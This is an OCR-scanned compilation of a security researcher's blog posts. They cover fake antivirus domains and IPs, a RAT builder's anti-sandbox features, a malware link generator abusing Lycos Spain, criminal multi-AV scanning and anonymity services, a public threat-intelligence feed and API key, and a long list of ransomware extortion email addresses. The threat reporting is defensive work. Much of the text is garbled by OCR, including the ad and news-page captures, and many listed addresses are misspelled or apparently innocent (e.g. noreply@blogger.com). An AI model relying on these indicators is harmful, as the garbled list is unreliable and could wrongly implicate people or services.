Medium account here - [5]https://medium.com/@danchodanchev my YouTube chan- 
nel here - _— [6]https://www.youtube.com/channel/UCH2ocTnppIEoLqGGAUG4cm3Q my 
Archive.org compilation of research here - [7]https://archive.org/details/@ddanchev_in- 
cluding my Keynote on tracking down and monitoring of the Koobface botnet here - 
[8]https://www.youtube.com/watch?v=hgQ _nxoMXzY and don’t forget to send all your 
friends a link to this post including to my front page at - [9]https://ddanchev.blogspot.com/ 
include the following photos: 
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Windows Antivirus 


What is Spyware 


Spyware, the a vrus, is a mabcous 
sobware planted on your PC by a fir 
Datly in Ceder to Secrety Monto whut 
you 6 oraine 


C@ your browsing hates are 

3 wih endess 
ats, Popups and Spam from 
your PC! 


Spywate aso Gramamcaty slows Oown 
yOu Compastet and intemet comnecton 
speeds 


fe collects your prvate 
yc vd Steals your sSerity 


Card Getads and cer 


START FREE SCAN 


QB mn 


Windows Antivirus 2008 an award-winning 
spyware removal utitty will help you Sighting all 
kinds of spyware and adware including 
keyloggers, trojan horses. password (eves and 
on 


TRY NOW FOR FREE 


Basic signs of Spyware infection 


if he answer to one of these QuesBons 1 “Yes”, then pou are probatty infected 


1 Your computer has slowed down 


2 Your internet connecton speed has decreased 


2. You haw C Of sofware from the Wed 


4 You get ¢ arnoying ads when youre online or Bometmes even ofine 
5 Your detaut home page has been changed to the one you didn't ask for 
6 You have an extra toolbar installed. and you dont inow where @ came from 


You recetve more spam emads fan ever 


CHECK YOUR PC NOW 


sp-preventer.com (92.241.163.32) 


spypreventers.com 


u-a-v-2008.com (92.241.163.31) 


uav2008.com 


power-avcc.com (92.62.101.57) 


power-avc.com 


pvrantivirus.com 


m-s-a-v-c.com (92.62.101.55) 
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ms-avcc.com 


ms-avc.com 


wav2008.com (92.241.163.30) 
wiav2009.com 

win-av.com 

windows-av.com 


windowsav.com 


You know the drill. 


Related posts: 

[2]A Diverse Portfolio of Fake Security Software - Part Seven 
[3]A Diverse Portfolio of Fake Security Software - Part Six 
[4]A Diverse Portfolio of Fake Security Software - Part Five 
[5]A Diverse Portfolio of Fake Security Software - Part Four 
[6]A Diverse Portfolio of Fake Security Software - Part Three 
[7]A Diverse Portfolio of Fake Security Software - Part Two 


[8]Diverse Portfolio of Fake Security Software 


. http://4.bp.blogspot .com/_wICHhTiQmrA/R3WKqj8-MnI/AAAAAAAABSw/9FrQmDwhpb4/s1600-h/mcgruff_cybercrime. jpg 
ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.htm 


ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.htm 


. http: //ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 
6 
7 
8 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 
. http: //ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 
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4.10.11 Summarizing Zero Day’s Posts for September (2008-10-07 17:54) 


ZDNet Search a 


Home News & Blogs Videos White Papers Downloads Reviews Popular - 


\, 
Ryan Naraine, Dancho Danchev & Adam O'Donnell a 
% Mess OP tmel Aen GE temate BE Dentro t s 2 


=] vew] 


ZDNet Must Read 
Firefox + NoScript vs Clickjacking 
In response to my story earker on the cross-browser Cicigaciang 


explot treat, | recewed the folowing e-mad from Gorgo Maone, 
the popular Firefox NoScrek plug ontnued » 6) r a yo ur . 
Printers 


October 6th, 2008 IT needs. ‘Green’ Font Cuts 


. . . Costs and Sx 

iPhone hits another security res (ONE) 

speedbump Three Ways to 
Save Paper 


BNET 
poms cow) Tamm 
es mY o> Ageia Boorman feancoad’s Savoy ~ 
pam and Ptah o and Adsare. Exain® code. Data thet. & CNET Reviews 


Seemnelt thie Code Rendon Meee Rie 7s printer buries 
t g auide (CNET) 
Sponsored Links Sia all ecteseee 


Norton Alternative oy pomnaal oh 


PC Magarme - Editor's Choe, Does Not 

Stow Down Your Computer Plan 8 from 
G 

IT Salary Calculator 

Curious to know the salary of other EU 

IT pros? Find cut here! 


Infrastructure Security at your side 
Prowde security for vastly averse 


2 Xs the smarter 
Recent Entries weay to werk ie 
Coton 
Our professeonal 
color rk-et alin 
Apole’s ongorr struggles with o eorky elated Gesegn chroces have Croppeng the Stone NDA S te ones ove you 
extended to the Phone. According to security researcher Avi Raft ae scat — 
ma nd mo 
everyone's faverte mote device is vulnerable to two separate security . — pe ee? ERE value, Make the 
weaknesses that expose milbons of users to phishing and sparen yoer - 25 meena Fung Googe trend Smarter Cheece 
attacks heywoeds to serve matw are lanen bare > 


As usual, here’s September’s summary of all of my posts at [1]Zero Day. You may also want to 
catch up and go through [2]August’s and [3]July’s summaries, next to adding [4]my personal 
RSS feed or [5]Zero Day’s main feed to your RSS reader. 


Notable article for September - [6]Spamming vendor launches managed spamming ser- 
vice. 


01. [7]DoS vulnerability hits Google’s Chrome, crashes with all tabs 
02. [8]Malware and spam attacks exploiting Picasa and ImageShack 
03. [9]Spamming vendor launches managed spamming service 

04. [10]Facebook introducing new security warning feature 

05. [11]Google downplays Chrome’s carpet-bombing flaw 

06. [12]Targeted malware attack against U.S schools intercepted 
07. [13]The most "dangerous" celebrities to search for in 2008 

08. [14]Norwegian BitTorrent tracker under DDOS attack 

09. [15]Attacker: Hacking Sarah Palin’s email was easy 
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Stay tuned! 


. https: //www. youtube. com/watch?v=mQIZ-Esbg_ 
. https://disruptive-individuals.com/ 


. http://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho_Danchev_CV_2021.pdf 


_ https: //twitter. com/dancho_danchev 

. https://medium.com/@danchodanche 

_ https: //wuw. youtube . com/channel /UCH20cTnppIEoLqGAvc4cm3q 
. https: //archive. org/details/@ddanchev 

_ https: //wuw. youtube . com/watch?v=hgQ_nxoMXzY 

_ https: //ddanchev. blogspot. com/ 
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_hcVcf yStUNUJE7vUqVknTCPdkSzWxCcIbPzD20KoBBWjsB6cpqcLE 
ttps://blogger .googleusercontent .com/img/a/AVVXsEjD7_xu26_P6Mv9dCHS3gN1p98-xgaTEUHHS _nneOcaAS6dG8e7PXV 
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[30] 


[31] 


[32] 


[33] 


[34] 


bs: | o |e) ss 
: 
| Server name Server IP Comp. / User os CAM First execute Version Port Ping 


GS) Vitima_14888... 192.168.254.20. COBAIA/Admini Windows XP Se... No 05/10/2008 ~ 18:40 Public 0 80 0 
j 
| 
——— SSE 
Create new server (ee) 
Connection install settings Hide settings Anti-Debugging 
DNS /P (Max.: 20 Address) install name Abeer 7] Anti Vietwal PC 
= ¥ Change create date 
example.no-i9.0r9 *) frewall.exe JV Met server | Anti VMWare 
Password 
Address ist : Jv Anti VirtuaBox 
abed1234 Directory name: Several 
192.168.254.1 dilicache Hide PID from Ctr} AR+Del /| Try bypass SandBoxs 
Port J) Persist methods 
_ v Try cea hs re erdcant a 
pone before defaut browser 02 - ThrestExpert 
Windows folder explorer.exe 03 - Anubis 
@ System foker Server name 04 - CWSandbox 
Vina 
Startup methods Reoletry neme 05 - JoeBox 
—— tiSpy2008 06 - Norman Sandbox 
A = 
@ ActiveX StartUp {38C6J04M-WRGY-PO7E-4E54-W138WWEVEETH} Ser 
Mutex name: 
RKCU/run dows Frewa Both methods Don't StartUp 


© Create server 


Yet another piece of [1]malware promoted as a RAT (remote access tool) includes what’s 
turning into the defacto [2]set of anti-debugging features within RATs. 


As the authors point out, the Anti Virtual PC, VMware, Virtualbox, Sandboxie, ThreatEx- 
pert, Anubis, CWSandbox, Joebox, Norman Sandbox features inevitably increase the server 
size. Next to the product, there’s always the managed service of ensuring a lower detection 
rate for binaries submitted to the authors. 


1. http://ddanchev. blogspot . com/2008/09/commercialization-of-anti-debugging . htm 


2. http: //ddanchev. blogspot . com/2008/09/commoditization-of-anti-debugging. htm 


4.10.13 Cybercriminals Abusing Lycos Spain To Serve Malware (2008-10-09 11:01) 
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As always drop me a line at dancho.danchev@hush.com in case you have questions. 
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18.2.8 How To Integrate or Query My Public STIX STIX2 TAXII Threat Actor Specific 
Threat Intelligence Feed In Your Firewall or Security Solution - An Analysis 
(2022-02-21 03:02) 
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Dancho Danchev 


_ 


[1] 


Dear blog readers, 


Did you already pull my public and free STIX STIX2 TAXII threat intelligence feed using your 
and your organization’s [2]Lifetime API Key? 
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In this post I’ve decided to elaborate more and offer practical advice and links in terms of how 
you can pull and integrate my daily updated STIX STIX2 TAXII threat intelligence feed in your 
firewall or security solution and how you can actually use your Lifetime API Key for my feed in 
Maltego for possible enrichment of your loCs (Indicators of Compromise). 


Here’s your Lifetime API Key for you and your organization - 
f8aa0cca-a0ac-4eff-9c03-1c86ad7aee93 


Portal: [3]https://ddanchev.ngrok.io 

API: [4]https://ddanchev.ngrok.io/graphaq| 

API Documentation: [5]https://luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef059d6d59 
API Client: [6]https://opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pyc ti.Atm| 


API requirements: [7 ]https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sampl 
e 


TAXII Collection: [8]https://ddanchev.ngrok.io/ta xii2/root/collections/c2259b20-9c60-4dda- 
8931-8de970440f06/objects 


Bearer Token Authentication Required: [9]https://github.com/OpenCTI- 
Platform/opencti/issues/1198 


Maltego transforms available: -  [10]https://www.maltego.com/downloads/ ~— - 
[11]https://www.maltego.com/transform-hub/opencti/ - [12 ]https://www.maltego.com/transform- 
hub/stix/ 


As always feel free to drop me a line at dancho.danchev@hush.com in case you have any 
questions. 


¢ [13]Full list of solutions compatible with STIX STIX2 and TAXII 
¢ [14]EventLog Analyzer 

¢ [15]ThreatConnect 

¢ [16]Azure Sentinel 

¢ [17]Splunk 

¢ [18]Cisco 

¢ [19]Elemendar 

¢ [20]Cortex XSOAR 

¢ [21]TrendMicro 

¢ [22]ArcSight 


¢ [23]Microsoft Sentinel 
19347 


¢ [24]EventTracker 

e¢ [25]Plixer Scrutinizer 

¢ [26]Sumo Logic 

¢ [27]Kaspersky CyberTrace 
¢ [28]ServiceNow 

¢ [29]CheckPoint ThreatCloud 
¢ [30]Carbon Black EDR 

¢ [31]Cisco Email Gateway 
¢ [32]ThreatConnect 

¢ [33]LogPoint 

¢ [34]Tanium 

¢ [35]Symantec 

¢ [36]LogRhythm 

¢ [37]Infoblox 

¢ [38]Cloudera 


Sample screenshots of my STIX STIX2 TAXII Threat Intelligence feed in combination with 
Maltego: 


[39] 
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[43] 


Enjoy! 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEgvRictBO7rRCpeaf zUp054psq5xNCpAltwvkyYAozpwa49dRIyMhyob_ 
ZOmXVDk9UnS5s 04SZNHV2G91Tqwc7N j ZohfRSIY24RJu787p3£QQq 


. https://ddanchev. blogspot .com/2022/02/public-stix-stix2-taxii-threat-actor.htm 


2 
3. https://ddanchev.ngrok.io/ 
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. https: //ddanchev .ngrok. io/graphq. 
. https: //luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef 059d6d59 


ttps: //opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pycti.htm 


. https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sample 


ttps ://ddanchev .ngrok.io/taxii2/root/collections/c2259b20-9c60-4ddd-8931-8de970440f06/objects 
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25. https://docs.plixer.com/projects/scrutinizer/en/19.0.2/guides/stix_taxii.htm 
26. https://help.sumologic.com/Cloud_SIEM_Enterprise/Integrations/Integrate_CSE_with_a_TAXII_Feed 
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18.2.9 A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis - Part 
Two (2022-02-25 02:23) 


18.2.10 Dancho Danchev’s Sample Personal Conference and Event Photos - A Com- 
pilation (2022-02-26 04:21) 


Dear blog readers, 
I’ve decided to share with everyone a set of personal conference and event photos. 
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Server EXE: 


hip ... Installer.exe Generar =D 


Spanish cybercriminals have recently started taking advantage of the bogus accounts at Lycos 
Spain, which they seem to be registering on their own, by releasing a do-it-yourself malicious 
link generator redirecting to fake YouTube and Adobe Flash video pages. Whereas the concept 
of abusing legitimate web services for infection and propagation isn’t new, what’s new is the 
fact that [1]the FTP access is efficiently abused. 


Here’s a description of the link generator : 


| | @) http: /fusuarios.lycos.es* 


De > Y)} EEE ~ ranks to vata « 


This site might require the Following ActiveX control: “Adobe Flash Player 9' From ‘Adobe’. Click here to install... 


YouVideo 
Magos Divertidos 


Descarga de archivo - Advertencia de seguridad 


iDesea ejecutar 0 guardar este archivo? 


| Nombre: Installer.exe 
Tipo: Aplicacion, 124 KB 


De: usuarios.lycos.es 


! Los archivos procedentes de Internet pueden ser utiles, pero este 
Y tipo de archivo puede dafiar potencialmente su equipo. Si no confia 
en el origen, no ejecute ni guarde este software. / Cual es el riesgo? 


> | & | 4) menu 


"Download the program and run it asks for an ID (identifier), then copy it and paste it there, 
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then press’ Create Installer ‘and the program will create the Installer! (this program to run a 
simulation that is installing the Adobe Flash and indicates to our page that "has been installed 
Adobe Flash," in order to show the video when YouVideo refresh the page, this you must file 
tie it in with your server! and what flames or Installer Setup (simulating being an installer)! 
Now you need to upload that file you’ve joined an FTP, click Next and put the path of that file 
in the next step!" 
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wow Losiiehn.con =z ieeloeee pS NT] Hosen Video 
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Para wevalza ests pAgna. usted necesta tener la A*Rima version de adobe fash instalado en su 
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Para proceder haga clack en Descargar Ahora. y luego de la nstalaciAn refesque la pagna 


®) # Descargar ahora 
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chck sobre ella para poder instalar la nueva version Ge Adobe Flash Playe 


TamaAso Gel archivo &0 
Tiempo estimade para la descarga: 
VersiA'n 9 
Navegader 

Fecha de PeblicaciA'n: 


Whereas the tool is exclusively relying on Lycos Spain to host the binaries and the campaign 
itself, the recent [2]blackhat SEO campaign relying on pre-registered Windows Live Spaces 
and AOL Journals syndicating hot Google Trends keywords, further indicates the malicious at- 
tacker’s capabilities of efficiently abusing legitimate services. And with the process of [3]bogus 
accounts registration performed automatically, or [4]outsourced entirely, malicious services 
aiming to automate the abuse process are only going to get more efficient. 


1. http: //ddanchev. blogspot .com/2008/03/embedding-malicious-iframes-through.htm 
2. http: //ddanchev. blogspot. com/2008/10/syndicating-google-trends-keywords-for.htm 
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Distribution of keywords (frequency) 
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3. http: //ddanchev. blogspot .com/2008/08/exposing-indias- captcha-solving-economy.htm 


4. http://blogs.zdnet .com/security/?p=183 


4.10.14 Quality Assurance in Malware Attacks - Part Two (2008-10-14 10:59) 


Arrastra el fichero a la caja de texto o examina la ruta 


Exportar Resultados | Mas acciones si presionas el segundo boton del raton en lista 
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Hay informacion que unicamente puedes ver desde la seccion ‘Informacion Avanzada’ 


Escanear 


Antivirus cargados: 10 


Surprisingly, while opportunistic cybercriminals have long embraced the [1]malware as a ser- 
vice model, and are offering managed lower detection rate services for a customer’s malware, 
or DIY ones where the customer can take advantage of [2]popular tools ported to the Web, 
others are still trying to innovate at a faddish market niche - [3]multiple offline AV scanners 
tools aiming to ensure that their malware doesn’t end up in the hands of vendors/researchers. 
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Multiple offline AV scanning tools like this very latest release, naturally using pirated copies 
of popular antivirus software, are faddish, due to the fact that during the last two years, 
the underground has been busy working on several paid web based services, that not only 
make sure vendors and researchers never get the chance to obtain the samples, but also, are 
already offering scheduled scanning of malware and automatic ICQ/Jabber notifications for QA 
of the campaign, next to the rest of unique features disintermediating legitimate multiple AV 


scanning services. 
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Balance: 20$|Loagedas:test] Serviceloat @@ 0 


Scanning Finished 
Antiirus Version DatabaseVersion Resutt 
Antivir 2.1.11-49 2008-02-04 TR/Agent.3638 
ArcaVir 1.0.5 2008-02-04 - 
Avast 1.0.8 2008-02-03 “ 
AVG 7.5.50 2008-02-04 Trojan horse Downloader. Small. BIY 
BitDefender 7.60825 2008-02-04 Generic. Malware. did!! 3E3550AE 

ClamAy 0.91.2 2008-02-04 - 

DrvVeb 4.44.0.10150 2008-02-03 DLOADER Trojan 

eScan 2.0.8 2008-02-02 -- 

F-Prot 6.2.1 2008-02-04 W32/Downloader.gen10 
F-Secure 5.53 2008-02-04 _ 
Kaspersky 5.7.13 2008-02-04 _ 

McAfee 2.1.11-49 2008-02-01 Generic. ff trojan 

Nod32 2.16-2 2008-02-04 - 

Panda 9.04.03 2008-02-03 - 

Sophos 4.25.0 2008-02-04 Virus 'Mal/DownLdr-F* 
Symantec 1.0.3.8 2008-02-04 - 

VBA32 3.12.25 2008-02-04 - 

VirusBuster 1.3.4 2008-02-04 _ 
Additional information 


FileName: lo.exe 
FileSize: 3638 bytes 
MD5: addSc5eadda0caa482bb4353ab3233eb 
SHA1: 4017341 ed4525a8ce2f20033ch2dd6dd84099694 
TotalResults: 7/18 


Certain features within such services clearly speak for the intentions of the people behind the 
service. For instance, among one of these features is the ability to fetch a binary from a set of 
given dropper URLs like malwaredomain.com/binary.exe, the result of the scan can then alert 
the malware campaigner about the current state of detection. 


What’s on these proprietary multiple AV scanning service’s to-do list? Let’s say anything 


that a legitimate multiple AV scanning service would never offer, like the following according 
to one of the services in question : 
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Mass website hacking tool alerts to dangers of Google 
dorks 
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attacbers, tet Barry Shteiman, dinncter of security strategy with leperva teid GOMagating core on Tunaday that @ ie 
De Google dorks that should Be reising atinms. 


Web Gang Operating in the Open 
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Sony PlayStation site victim of 
SQL-injection attack 

Automated attack claims escther high-profile target, cffering 
sole of a take anivirus scanner. 
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Crimeware gets worse - How to 
avoid being robbed by your PC 
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The Rise of Malware as a Service (MaaS) 
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Balance: 20$| Logged as: test] ServiceLoad @ 


Logged as : test 
AccountType: PayPermMonth 
Balance: 20$ 


FreeChecks Per Month: 0 
FreeChecks Left: 0 
PayPerMonth : 40$ 
PayPerCheck : 1$ 


CreationDate : 2008-02-04 17:56:57 
Last Visit Date: 2008-02-05 01:36:35 
Last Check Date: 2008-02-05 00:58:09 


- DIY heuristic scanning level settings for each of the software in place 


- upcoming sets of anti soyware and personal firewalls with detailed statistics of the sandboxing 
- behavior-based detection results 


The possibilities for integrating such proprietary multi AV scanning services within the 
QA process of a malware campaign are countless, and both, the customers and the sellers 
seem to have realized the potential of this ecosystem. 


1. http: //ddanchev. blogspot .com/2007/10/multiple-firewalls-bypassing. htm 
2. http: //ddanchev. blogspot. com/2007/08/malware-as-web-service.htm 
3. http: //ddanchev. blogspot . com/2008/04/quality-and-assurance-in-malware.htm 


4.10.15 The Cost of Anonymizing a Cybercriminal’s Internet Activities 
(2008-10-14 21:23) 
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What would the perfect traffic anonymity service provider targeting cybercriminals consist of? 
A service operating in Russia that is on purposely not logging any of its user’s activities, next 
to allowing direct spamming from the socks servers, automatic rotation of the VPN servers 
which they operate in a RBN style hosting provider, or a service using [1l]actual malware 
infected hosts as VPN tunnels not only securing the cybercrime traffic, but also, forwarding 
the responsibility for the malicious activities to the end user? 


> Encryption - Secures Internet Connection 
> Fast Speed - Not more then 30 Clients per server 


> Compression - Rises your Connection Speed 
> Compression - Less Traffic, Cheaper GPRS 


Long gone are the days of socks chaining, the practice of automatically connecting to multiple 
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170. 


18.2.11 Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Four (2022-02-27 08:32) 


[1] 


cccl cockCOM 


protonmail 


tuta tutanota 


Dear blog readers, 


Continuing the "[2]Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Three" blog posts series I’ve de- 
cided to share yet another currently active portfolio of ransomware themed email address 
accounts currently involved in a variety of campaigns. 


Sample ransomware-themed personal email address accounts known to have been currently 
active and used in a variety of campaigns include: 


helpmanager@mail.ch 
restoremanager@airmail.cc 
Hiden _pro@aol.com 
Hiden _pro@tutanota.com 
LLTP@mail2tor.com 
contatomaktub@email.tg 
info@bestsecuritysearch.com 
manager@mailtemp.ch 
managerhelper@airmail.cc 
bitcoinl43@india.com 
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mosteros@firemail.cc 
gorentos@bitmessage.ch 
restorefiles@firemail.cc 
qar48@tutanota.com 
unCrypte@outlook.com 
decodevoid@gmail.com 
docodepepe@gmail.com 
petersburgrecover@protonmail.com 
jacklee@airmail.cc 
jacklee73@mail.ua 
b1tcO1ln@aol.com 
decryptbox@airmail.cc 
Folieloi@protonmail.com 
Ctorsenoria@tutanota.com 
lillysoft.it@gmail.com 
Fud@india.com 
Alex.vlasov@aol.com 
Diablo diablo2@aol.com 
Restore@protonmail.ch 
Catsexy@protonmail.com 
Guardware@india.com 
Systemdown@india.com 
Milarepa.lotos@aol.com 
Sitaram108@india.com 
GruzinRussian@aol.com 
Ncrypt@cock.li 
Xbotcode@gmail.com 
Meldonii@india.com 
Recuperadados@protonmail.com 
amagnus@india.com 
Hairullah@inbox.|v 
Gerkaman@aol.com 
Matrix9643@yahoo.com 
slaker@india.com 

Space _rangers@aol.com 
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Sos@anointernet.com 
ihurricane@sigaint.org 
Drugvokrug727@india.com 
Help@decryptservice.info 
Grand _car@aol.com 
Batman _good@aol.com 
Decryptallfiles3@india.com 
mkgoro@india.com 
Savepanda@india.com 
Cocoslim98@gmail.com 
fixfiles@protonmail.ch 
Bitcoinpay@india.com 
Masterlock@india.com 
Cyber baba2@aol.com 
Siddhiup2@india.com 
Mich78@usa.com 
Raa-consultl@keemail.me 
Lavandos@dr.com 
Calipso.god@aol.com 
hnumkhotep@india.com 
Mailrepa.lotos@aol.com 
rescuers@india.com 
Legioner_seven@aol.com 
avastvirusinfo@yandex.com 
garryweber@protonmail.ch 
Love.server@mail.ru 
Okean-1955@india.com 
Ramachandra7@india.com 
Decipher@keemail.me 
File-help@india.com 
Makdonalds@india.com 
Supermagnet@india.com 
Last centurion@aol.com 
haizenberg@aol.com 


Doctor@freelinuxmail.org 
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Suppteam01@india.com 
Supportfriend@india.com 
Radxlove7@india.com 
Happydayz@india.com 
black.world@tuta.io 

Seven _legion@aol.com 
Ninja _gaiver@aol.com 
safeanonym14@sigaint.org 
fantomd12@yandex.ru 

Age _empires@india.com 
Help _you@india.com 
DIGITALKEY@163.com 
SharkO1@msgden.com 
Helpme@freespeechmail.org 
Grapn206@india.com 
wyna@nyu.edu 
Suppteam03@india.com 
assistant@bitmessage.ch 
youneedmail@protonmail.com 
Thedon78@mail.com 
Orgasm@india.com 
Decryptutility@protonmail.com 
Ceril33@india.com 

A _Princ@aol.com 
Decryptallfiles@india.com 
Melme@india.com 
helpmeonce@mail.ru 
Bitcoinrush@imail.com 
webmafia@asia.com 
Nomoneynohoney@india.com 
Blacknord@tutanota.com 
Helper023@cock.li 
partytime123@default.rs 
Recoverfiles2017@qq.com 
GuardBTC@cock.|i 
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Wisperado@india.com 
jonskuper578@india.com 
Decrypthelp@qq.com 
MerlinStusan@protonmail.com 
Decrypthelp@qq.co 
MildredRLewis@teleworm.us 
systems@tutanota.com 
xzet@tutanota.com 
Payfornature@india.com 
szem@tutanota.com 
Peekabooo@qq.com 

help 911 support@rambler.ru 
help@tutanota.com 
Szems@tutanota.com 
Tizer78224@india.com 
Tizer77234@protonmail.com 
recfiles@protonmail.com 
Patagonoa92@tutanota.com 
Worldcry@cock.li 
Opencode@india.com 
Hellstaff@india.com 
mr.dec@tutanota.com 
mr.dec@protonmail.com 
recoveryl@writeme.com 
gardengarden@cock.|i 
JoniCarter@protonmail.com 
servicedeskpay@protonmail.com 
brbrcodes@gmail.com 
datastore2018@mail.ru 
f1220@tuta.io 
sebastiennolet92@gmail.com 
castor-troy-restore@protonmail.com 
petropasevich@aol.com 
blacklist@clock.li 
Blacklist@cock.li 
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Mammon-decrypt@protonmail.com 
Stopencrypt@qq.com 

Light Yagami@tuta.io 
backtonormal@foxmail.com 
decryptgarranty@airmail.cc 
Pumarestore@india.com 
lolitahelp@cock.li 
wewillhelp@airmail.cc 
wayneevenson@protonmail.com 
Stevenseagal@airmail.cc 
Cyberwars@qq.com 
yoursalvations@protonmail.ch 
Grizzly@airmail.cc 
incongnitoman@protonmail.com 
InkognitoMan@tutamail.com 
ru9944@yandex.ru 
btcdecripter@qq.com 

Santa _helper@protonmail.com 
deathransom@ainmail.cc 
ponce.lorena@aol.com 
waiting@bitmessage.ch 
jundmd@cock.li 

oovro@aol.com 

traher@dr.com 

my _service@scryptmail.com 
Supportdecrypt@firemail.cc 
unlockdata@foxmail.com 
Merosa@india.com 
Mrpeterson@cock.|i 

restore service99@scryptmail.com 
Bitcharity@protonmail.com.com 
F-data@protonmail.com 
audrey.b@aol.com 
Lockhelp@qq.com 
decryptxxx@protonmail.com 
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malware infected hosts in order to use them as stepping stones, in between the rest of the 
malicious activities going on their behalf. 


User: 


172.162., US == 
$3.84. | N= 
172.163. US= 


221.171.| JP @ 
213.122.| UK 


91.49. 9 

98.181. 4 

64.234. 9 

65.65. US & Dallas Texas 
24.151. | Use | [ 


All (10) | 
Unknown (3) 

JP- Japan (1) 

NL- Netherlands (1) 

UK - United Kingdom (1 } 
US - United States (4) 


The possibilities for building point-to-point or server-to-multiclient encrypted tunnels between 
malware infected hosts by using already available Socks5 functions has always been there. 
As of August, the coders behind a relatively popular web based malware originally started as a 
DDoS kit, but later on started introducing new features on a "module basis", they have started 
offering a BETA module for building a VPN network of malware infected hosts, including an 
admin panel for reselling access to these hosts in order to better monetize their botnet. 
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help557@gmx.de 
payday@tfwno.gf.ht 
cybergroup1@aol.com 
estemaniii@airmail.cc 
Decryptbots@cock.li 
checkcheck07@qq.com 
nmode@tutanota.com 
Mespinoza980@protonmail.com 
daves.smith@aol.com 
Datahelp@iran. ir 
Datarestorehelp@firemail.cc 
Gorentos2@firemail.cc 
Restorealldata@firemail.cc 
MerlinWebster@aol.com.com 
Billwong73@yahoo.com 
Honeylock@cock.li 
Bitdefender2020@cocxk.|i 
cyberunion@tuta.io.cu 
backinfo@protonmail.com 
rdpconnect@protonmail.com 
cyberunion@tuta.io 
doctor777@mail.fr 
tomascry@protonmail.com 
assonmolly5@gmail.com 
loybranunun1975@protonmail.com 
cl _crypt@aol.com.cl 
akzhq808@tutanota.com.ma 
noreply@blogger.com 
acryhjccbb@protonmail.com 
Unlocksupp@airmail.cc 
look1213@protonmail.com 
actum _signum@aol.com 
Black.mirror@qq.com 
Brcode2017@gmail.com 


Serverdrona@gmail.com 
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Anony.killers@protonmail.com 
Decoder@keemail.me 
Zip@email.tg 
Colecyrus@mail.com 
pepsicola@femconc.com 
Support@decrypt.ws 
restorel9@cock.li 

mmm _reborn@tutamail.com 
skynet45@tutanota.com 
Leab@tuta.io 
Insane@airmail.cc 
Devicerestore@india.com 
r3vo@protonmail.com 
Unickr@protonmail.com 
MerlinVelso@protonmail.com 
Cho.dambler@yandex.com 
email-byaki buki@aol.com 
decryptorsoon301@aol.com 
Fast Decrypt and _Protect@Tutanota.com 
_ _murzik@jabber.mipt.ru 
Helps@tutanota.com 
Murzik@jabber.mipt.ru 
Dec999@cock.li 
ThomasRaymond@protonmail.com 
CyberSCCP@protonmail.com 
Info@fugunator.de 
superuser111@OnllLne.at 
getdataback@fros.cc 
help@decrypt-files.info 
Darknes@420blaze. it 
yourhope@airmail.cc 

Kurosaki _ichigo@tutanota.com 
help@decrypt-files.in 
Goodjob24@foxmail.com 
Decryptor@cock.li 
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decyourdata@protonmail.com 
pausa@bitmessage.ch 
sebekgrime@tutanota.com 
NastasyaTurkina68@mail.ru 
seed@firemail.cc 
AiDcrypt@tutanota.com 
Helper@tfwno.gf 
helperx@tuta.io 
bufalo@firemail.cc 
crypted luedtkis@feudtory.com 
3442516480@qq.com 
Gerentoshelp@firemail.cc 
Sambolero@tutanoa.com 
Mrcrypting@airmail.cc 
Salesrestoresoftware@firemail.cc 
Salesrestoresoftware@gmail.com 
Admin@decryption. biz 
goodencrypt88@gmail.com 
backdata.company@aol.com 
fiasco911@protonmail.com 
_infectionplex@cock.li 
cashdashsentme@protonmail.com 
ezequielanthon@aol.co 
Tchukopchu@tutanota.com 
marketing@geeksadvice.com 
restoreadmin@firemail.cc 
BM-2cXonzj9ovn5qdX2MrwMK4j3qCquXBkKo4h@bitmessage.ch 
norbewebb@gmail.com 
code1024@keemail.me 
code1024@onionmail.org 
helpsupportmanager@airmail.cc 
helprestoremanager@airmail.cc 
quacksalver@onionmail.org 
cOv1d19@job4u.com 
clean@onionmail.org 
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todecrypt@disroot.org 
decrypttme@airmail.cc 
crimecrypt@aol.com 
crimecrypt@airmail.cc 
geniusid@protonmail.ch 
felix@countermail.com 
nullcipher@cock.li 
prndssdnrp@mail.fr 
dfgkbtprz@aol.com 
gygabot@cock.li 
newhelper@protonmail.ch 
how _decrypt@aol.com 
Ixhlp@protonmail.com 
ucos2@elude.in 
r3ad4@aol.com 
cavefat@tuta.io 
mr.hackprO@aol.com 
openpgp@foxmail.com 
dr.decrypt@aol.com 
hlpp@protonmail.ch 
admin@stelsdatas.com 
wecanhelpu@tuta.io 
hitsbtc@tuta.io 
onepconebtc@protonmail.com 
Bit decrypt@protonmail.com 
Mail@qbmail.biz 
gangflsbang@protonmail.ch 
decspeed@tutanota.com 
day O@aol.com 
im.online@aol.com 

de _cryption@tuta.io 
btckeys@aol.com 
coronavirus@foxmail.com 
help.crypt@aol.com 
Decoding@qbmail.biz 
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mark _white@mail.ua 
grandtheftfiles@aol.com 
back data@foxmail.com 
dryidik@tutanota.com 
ncov2020@aol.com 
decrypt@qbmail.biz 
black@gytmail.com 
coronavirus@qq.com 
help.me24@protonmail.com 
cryptlive@aol.com 
mr.crypteur@protonmail.com 
asdbtc@aol.com 
syspentest@aol.com 
ninja777@cock.li 
blablacar@airmail.cc 
rsacrypt@aol.com 
amandacerny89@aol.com 
databack@qbmail.biz 
fullrestore@qq.com 

back me@foxmail.com 
bitlocker@foxmail.com 
Blackmax@tutanota.com 
ban.out@foxmail.com 
Zagrec@protonmail.com 
Logan8833@aol.com 
xatixxatix@mail.fr 
